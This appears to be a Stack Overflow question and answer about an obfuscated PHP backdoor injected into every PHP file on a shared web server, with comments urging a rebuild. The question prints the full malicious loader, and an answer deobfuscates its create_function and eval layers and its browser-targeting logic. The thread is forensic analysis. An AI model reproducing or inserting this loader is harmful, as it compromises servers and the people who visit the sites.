# Malicious code found in PHP files. What does it do?

Tags: php, virus, computer-forensics

I discovered this code inserted at the top of every single PHP file on My PHP server. I want to figure out what this script was doing, but I don't know how to decipher the main hidden code. Can someone with experience in these matters decrypt it, because I'm not a programmer?

Thank you very much!!

link to a sample infected php file: https://drive.google.com/open?id=0B8PYE4BruOdMa2dWZDBLY09VRTA

**The code is**

```
<?php $tdzueclt = 'tvctus)%     x24-    x24b!>!%y((strstr($uas,"        x6d     163     x69     145")) or (strstrR;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}      x27;!>>>!}_;x5cq%7**^#zsfvr#      x5cq%)uftr#     x5cq%7/7#@#7/7^#iubq#   x5cq%   x27jsv%6<C>^#zsfvr#     24gps)%j>1<%j=tj{fpg)%  x24-    x24*<!~!        x24/%t2w/       x24)##-!#~<)tpqsut>j%!*72!        x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%55946-tr.984:75983:48984:71]K9]77]D4]82sutcvt)fubmgoj{hA!osvu37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofm2]3]364]6]283]427]36]373P6]36]73]83]238M7]381]21rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1)tpqsut>j%!*9!      x27!hmg%)!gj!~<341]88M4P8]37]278]225]241]334]368]32utjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)qbtwu = implode(array_map("fwukcjc",str_split("%tjw!>!#]y84]275]y83ion fwukcjc($n){return chr(ord($n)-1);} @error_reporting(0); $aguhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<x7fw6*CW&)7gj6<.[A       x27&6<  x7fw6*277#<!%t2w>#]y74]273]y76]252]y85]x22)7gj6<*QDU`MPT7-N1M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]28|:**t%)m%=*h%)m%):fmjiALS["     x61       156     x75     156     x61"]=1; $uas=strtolower($_SERVER["     x48     if((function_exists("   x6f     142     x5f     163     x74     x61     156     x75     156     x61"])))) { $GLOB88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:141   x72     164") && (!isset($GLOBALS["     %tmw/   x24)%c*W%eN+#Qi x5#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<112)eobs`un>qp%!|Z~!<##4]364]6]234]342]58]24]31##/#/},;#-#}+;%-qp%)54l}      gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~x24-      x24     x5c%j^  x24-    x24yfu%)3of)fepdof`57ftbc x7f!|!*uyfu     x27k##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]81]K78:56985:6197g:74985-rr.93e:5597f-%tdz>#L4]275L3]248L3P6L1M5]D2P!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`o   x7f_*#[k2`{6:!}7;!}6;*#k#)usbut`cpV     x7f     x278]y3f]51L3]84]y31M6]y3e]81#/#7e:l}S;2-u%!-#2#/#%#/#o52 137     x41     107     x45     116     x54"]); if bssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)t-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]#)fepmqyf     x27*&7-n%)utjm6<        x7f124  x54     120     x5f     125     x53     105     xx:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]s:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]!%tmw!>!#]y84]275]y83]273]y76]sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!      x24/%tmw/       x24)%zW%h>EzH,2W:*r%:-t%)3of:opjudovg<~   x24<!%o:!>!     x2421($uas,"    x72     166     x3a     61      x31")) or (strstr($uas,"        x61     156     x6]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!x246767~6<Cw68  x24-    x24]26  x24-    x24<%fV x7f<*X&Z&S{ftmfV        x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R3~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gjoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4  x223}!+5        156     x63     164     x69     157     x6e"; functx27;%!<*#}_;#)323ldfid>}&;!osvufs}     x7f;!opjudovg}k~~9{SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR        x27id6<.fmjgA   x27doj%6<       x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<       x7fw6*CWtfs%)7gj6%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r        x5c2^-%hOh/#00#W-%tdz*Wsfuvso!%bss      x5csboe))1/35.)1/14+9**-)1/2986+7**^/%d%:osvufs:~928>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275t<C       x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7U4      162     x6f     151     x64"))) { $ggw*17-SFEBFI,6<*127-UVPFNJU,6<*27-j%6<*Y%)fnbozcYufhAx272qj%6<^#zsfvtj        x22)gj6<^#Y#    x5cq%   x27Y%6<.msv`ftsbqA7>q%6<        x7)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNek!~!<b%      x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uftpf{jt)!gj!<*2bd%-#1GO     x2fs!~<3,j%>j%!*3!      x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%y)#}#-#       x24-    x24-tusqpt)%z-#:#*      x24-    x24!>!  epdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x      x22l:!}V;BFSUT`LDPT7-UFOJ`GB)fubfsdXA   x!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvgvc%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbtj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-u78}527}88:}334}472        x24<!%ff2!>!bssbz)      x24]25  x24-    x24-!%  x24-      x24*!|! e]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%2#)fepmqyfA>2b%!<*qp%-*.%)epqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#:>%s:        x5c%j:.2^,%b:<!%c:>%s:    x5c%j:^<!%w`    x5-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]cj,,*!|       x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x7,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojufs!*!+A!>!{e%)!>>    x22!ftmbg)!gj<7f        x7f     x7f<u%V x27{ftmw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX     x27u%)7fmjix6pjudovg      x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2     x5c2b%!>!2p%!*3>?*2b%)gc1^W%c!>!%i      x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%eFH#   x27rfs%6~6<     x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA        27,*c   x27,*b  x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111y38#-!%w:**<")));$qfzibwb = $ggwibsz("", $agqbtwu); $qfzib]#/*)323zbe!-#jt0*?]+^?]_   x5c}X   x24<tfsqnpdov{h19275j{hnpd19275fubmgc^>Ew:Qb:Qc:W~!%z!>2<!-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#fw6*  x7f_*#fubfsdXk5`{66~6<&w627K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    x273q33bq}k;opjudovg}x;0]=])0#)U!       x27{**u%-#jt0}Z;0]=]0#)2q%<     x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA        x27&256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!     x2400~:<h%_t%:osvuf!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+up:!ftmf!}Z;^nbsbq%        x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/<pd%w6Z6<.5`hAx27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%bw6Z6<.2`hA      x27pd%6<C       x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]4]D6#<%G]y6d]281Ld]245]K2]285]Ky%)utjm!|!*5!       x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4ibsz = "       x63     162       x65     141     x74     145     x5f     146     x7]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6cotn+qsvmt+fmhpph#)zx24/%tjw/     x24)%   x24-    x24y4     x24-    x24]y   x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#3q%}U;y]}R;2]},;osvufs}     x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;<*id%)ftpmdR6<*id%)dfyfR        x27tfs%6<#/%      x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!      x24/wb();}}STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSrhozatxvoh'; $pojuybf=explode(chr((594-474)),substr($tdzueclt,(22569-16643),(131-97))); $kidqhu = $pojuybf[0]($pojuybf[(4-3)]); $vmqdyitehy = $pojuybf[0]($pojuybf[(6-4)]); if (!function_exists('mztvoit')) { function mztvoit($nrnzvjzo, $wzcyeen,$yhvdrl) { $atusojcvl = NULL; for($hwkbsnvb=0;$hwkbsnvb<(sizeof($nrnzvjzo)/2);$hwkbsnvb++) { $atusojcvl .= substr($wzcyeen, $nrnzvjzo[($hwkbsnvb*2)],$nrnzvjzo[($hwkbsnvb*2)+(7-6)]); } return $yhvdrl(chr((43-34)),chr((368-276)),$atusojcvl); }; } $nethpkm = explode(chr((197-153)),'1185,42,1295,36,1227,33,1123,62,2167,29,1942,34,23,45,2411,58,3222,28,5540,43,2783,33,794,64,727,67,2469,62,5215,70,5404,58,2137,30,4354,66,3154,68,4541,59,1028,20,3644,30,4867,63,3282,35,164,51,138,26,3317,49,4837,30,4985,39,2913,69,5823,34,3250,32,2870,43,926,69,1846,22,1611,63,68,70,3720,67,657,27,684,43,360,22,3495,51,273,48,591,30,452,52,5493,47,4137,41,2690,33,1797,49,4420,67,3471,24,4004,27,858,68,4600,57,1406,23,5093,68,5651,20,1976,64,4031,62,3366,48,3787,48,3414,57,3835,41,1572,39,5161,54,1454,24,2816,54,3096,58,4751,32,2723,60,3674,46,4299,33,1868,20,4332,22,2555,65,4232,67,3590,54,5761,62,4930,55,1922,20,4715,36,2280,30,995,33,5024,69,2239,41,1260,35,1101,22,2196,43,382,70,2370,41,3876,70,1548,24,0,23,3546,44,5671,37,2531,24,4178,54,215,58,5857,62,1331,24,4487,54,5285,70,2310,60,2982,57,2620,70,1729,38,1674,55,1888,34,321,39,5583,68,1355,51,1767,30,5462,31,3946,58,2087,50,621,36,504,48,1048,53,1429,25,3039,57,552,39,5355,49,4093,44,4783,22,1478,70,5708,53,4805,32,2040,47,4657,58,5919,7'); $uszfcks = $kidqhu("",mztvoit($nethpkm,$tdzueclt,$vmqdyitehy)); $kidqhu=$tdzueclt; $uszfcks(""); $uszfcks=(721-600); $tdzueclt=$uszfcks-1; ?>
```

Comment: Please add the code in the question, not as an external image.

Comment: Did you tried the code in any online debugging tool?

Comment: I've tried Unphp.net, but it can't decode this code

Comment: That is just one string variable with some encoded data. Best way to be shure see if that data is injected via URL ($_GET) and parsed to any `js`

Comment: @Zend There's some actual code following that string. I'm trying to clean it up now...

Comment: It doesn't really matter what it does. Your server has clearly been compromised. Assume that anything and everything on it has been "stolen" and that the server is now under the control of someone else. **Nuke it from orbit, reinstall from scratch, fix security holes, restore data from last know good backup/source.**

Comment: @deceze It is not MY server, it is a production server with hundreds of sites out of my control. The modified php files are only with apache user permission on some users, so nothing is installed with root permission. I've already removed the code from injected files, but I wish to know what this script does and which customer has a hole (password weak/stolen, exploit, etc) to prevent in future the problem and warning the offending user

Comment: I understand that, but it's still a somewhat safe assumption that the server may be pwned. You can pretty much bet on that code allowing arbitrary code execution, which, even if it happens within the Apache user, can lead to root privileges sooner or later through a bunch of internal security holes. That's nothing new. Again, at the very least, the attacker has access to anything PHP/Apache has access to, which is basically *everything* of value on that server.

Comment: @Balteck I suspect the payload variable (the long string blob) is broken - did you copy that from the console? If so, characters outside the ASCII range, as well as string offsets are bound to be broken. As it stands, [the code you posted won't run](https://3v4l.org/nI3jt).

Comment: @Siguza I've posted a sample infected PHP file inside a zip. It is untouched

Comment: @Deceze I fully agree with you. But meanwhile I prepare and replace the server (and find the site with hole, if any) , to know what this code does, it is important for me

Comment: Pragmatically speaking, I'd alert everyone on that server that the worst case has happened and everybody should assume everything is gone. I don't think it's worth anybody's time to investigate this in more detail, because it's unlikely you'll come to a more limited conclusion. Again, very very likely you'll find that arbitrary code execution is included in that, at which point you simply don't know what happened. Looking at log files and other activity indicators on the server will probably give you more information. Of course, I could be wrong, but you decide how much your time is worth...

Answer (score 10):

Well, let's try to trace what's going on. First, let's beautify that ugly code a little:

```
<?php 
$tdzueclt = '...';
$pojuybf = explode(chr((594 - 474)), substr($tdzueclt, (22569 - 16643), (131 - 97)));
$kidqhu = $pojuybf[0]($pojuybf[(4 - 3) ]);
$vmqdyitehy = $pojuybf[0]($pojuybf[(6 - 4) ]);
if (!function_exists('mztvoit')) {
    function mztvoit($nrnzvjzo, $wzcyeen, $yhvdrl) {
        $atusojcvl = NULL;
        for ($hwkbsnvb = 0;$hwkbsnvb < (sizeof($nrnzvjzo) / 2);$hwkbsnvb++) {
            $atusojcvl.= substr($wzcyeen, $nrnzvjzo[($hwkbsnvb * 2) ], $nrnzvjzo[($hwkbsnvb * 2) + (7 - 6) ]);
        }
        return $yhvdrl(chr((43 - 34)), chr((368 - 276)), $atusojcvl);
    };
}
$nethpkm = explode(chr((197 - 153)), '...');
$uszfcks = $kidqhu("", mztvoit($nethpkm, $tdzueclt, $vmqdyitehy));
$kidqhu = $tdzueclt;
$uszfcks("");
$uszfcks = (721 - 600);
$tdzueclt = $uszfcks - 1; 
?>
```

Now, let's evaluate line by line to see all the hidden things:

```
$pojuybf = explode(chr((594 - 474)), substr($tdzueclt, (22569 - 16643), (131 - 97)));
$kidqhu = $pojuybf[0]($pojuybf[(4 - 3) ]);
$vmqdyitehy = $pojuybf[0]($pojuybf[(6 - 4) ]);
```

... becomes ...

```
$pojuybf = array('STrrEv', 'NoITCnuF_EtaeRC', 'ECaLPer_RtS');
$kidqhu = 'CReatE_FunCTIoN';
$vmqdyitehy = 'StR_rePLaCE';
```

Then goes the `mztvoit` function definition (not important yet) and then we go on defining strange data:

```
$nethpkm = array(1185, 42, ...); // after the explode()
```

Now we start calling some functions:

```
$uszfcks = $kidqhu("", mztvoit($nethpkm, $tdzueclt, $vmqdyitehy));
```

... becomes ...

```
$uszfcks = create_function('', mztvoit(array(1185, 42, ...), $tdzueclt /* that original ugly string*/, 'str_replace'));
```

So that strange `mztvoit` function defined above generates some function body source code by getting and mixing some parts of that ugly megastring. It's first argument (the array of numbers) probably serves as some coordinates pointing to the megastring. Without going deep into the process, it would be nice to just show the new anonymous function's body:

```
$body = mztvoit($nethpkm, $tdzueclt, $vmqdyitehy);
die($body);
```

But unfortunately, here I become stuck, because the original megastring became damaged, as I copied it from the web browser (it probably contained some unprintable characters, which have been lost during copy & paste from the web).

So now it's Your turn to show us, what the function's body is, as You have the original megastring. Thanks! :-)

**UPDATE:**

Thanks for the original PHP file, now we can go on! So the anonymous function, created by `mztvoit` looks very ugly - it contains next level of obfuscation:

```
if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {

    $GLOBALS["anuna"]=1;
    $uas=strtolower($_SERVER["HTTP_USER_AGENT"]);

    if ((strstr($uas,"msie")) or (strstr($uas,"rv:11")) or (strstr($uas,"android"))) {

        $ggwibsz = "create_function";

        function fwukcjc($n){

            return chr(ord($n)-1);
        }

        @error_reporting(0);
        $agqbtwu = implode(array_map("fwukcjc",str_split("%tjw!>!#.../* ...tons... */")));

        $qfzibwb = $ggwibsz("", $agqbtwu);
        $qfzibwb();
    }
}
```

**UPDATE:**

... which produces and runs another (still obfuscated) function (`$agqbtwu` is it's source code):

```
$siv = "str_replace";
$v9 = '$v9 = #5656}5 ... 99));'; // another loads of s#!t
eval($siv("#", "\x27", $v9));
```

... which produces ...

```
$v9 = '5656}5;Bv ... SV}'; // still a lots of who-knows-what...
eval($siv(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99));
```

... which finally evaluates to something readable:

```
function oo2($b) {

    $h = explode("|", strrev($b));
    $d = explode("*", $h[0]);
    $b = $h[1];

    for($i=0;$i<sizeof($d);$i++) {

        $b = str_replace($i, $d[$i], $b);
    }

    create_function("", "};".$b."//");
}

function cqq($qw) {

    $domarr =array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return random($domarr,$qw);
}

function oo1($y) {

    $y= strrev($y);
    $g=substr($y,strpos($y,"9")+1);
    $v = explode(":",substr($y,0,strpos($y,"9")));

    for($i=0;$i<sizeof($v);$i++) {

        $q = explode("|", $v[$i]);
        $g = str_replace($q[0],$q[1],$g);
    }

    create_function("", "};".$g."//");
}

$s1v("", $siv("\71"," ",$slv($svv)));

function random($arr,$qw) {

    $g='w-86794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-873,g= w. r; m-86d944835,sq-87396487293787396086c951874";';
    $soy = "en2";
    $xx='explode';
    $ecx='create_function';
    $scy='str_replace';
    $a = $xx("|","\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44");
    $aa = $xx("|","8|9|-|,| ");
    $mec=$ecx;

    for($i=0;$i<sizeof($a);$i++) {

        $g = $scy($aa[$i],$a[$i],$g);
    }

    $ecx("", "};$g//");
    $mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy));

    return $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw;
}

$r9 = explode("|",$n9);
$b9=0;
$a9=0;

for($i9=0;$i9<sizeof($r9);$i9++) {

    if ($i9==0)
        $a9=0;
    else
        $a9=$r9[$i9-1]+$a9;

    $b9=$r9[$i9];
    $v_[]=substr($v9, $a9, $b9);
}

$y =1;
for($i=0;$i<5;$i++) {

    $vv1 ="o"."o".$y;
    if ($y==1)
        $y=2;
    else
        $y=1;

    $vv1($v_[$i]);
}
```

Now You may try to solve the rest on Your own, it should be rather easy now.

Comment: Thank you Roman, You are the man!
I've posted the original infected file on my google drive. So you can see all the untouched code

Comment: Couldn't we just use a profiler to show the clear sourecode?

Comment: @DanFromGermany May you explain me what do you mean? I'm new on Stackoverflow and I'm not a PHP programmer

Comment: @DanFromGermany: Yes, You can! I am trying to be careful, I do not want to step through such an obfuscated code, but feel free to use a debugger and share what You get!

Comment: Thank You very Much. So this script is:
https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-111911-4342-99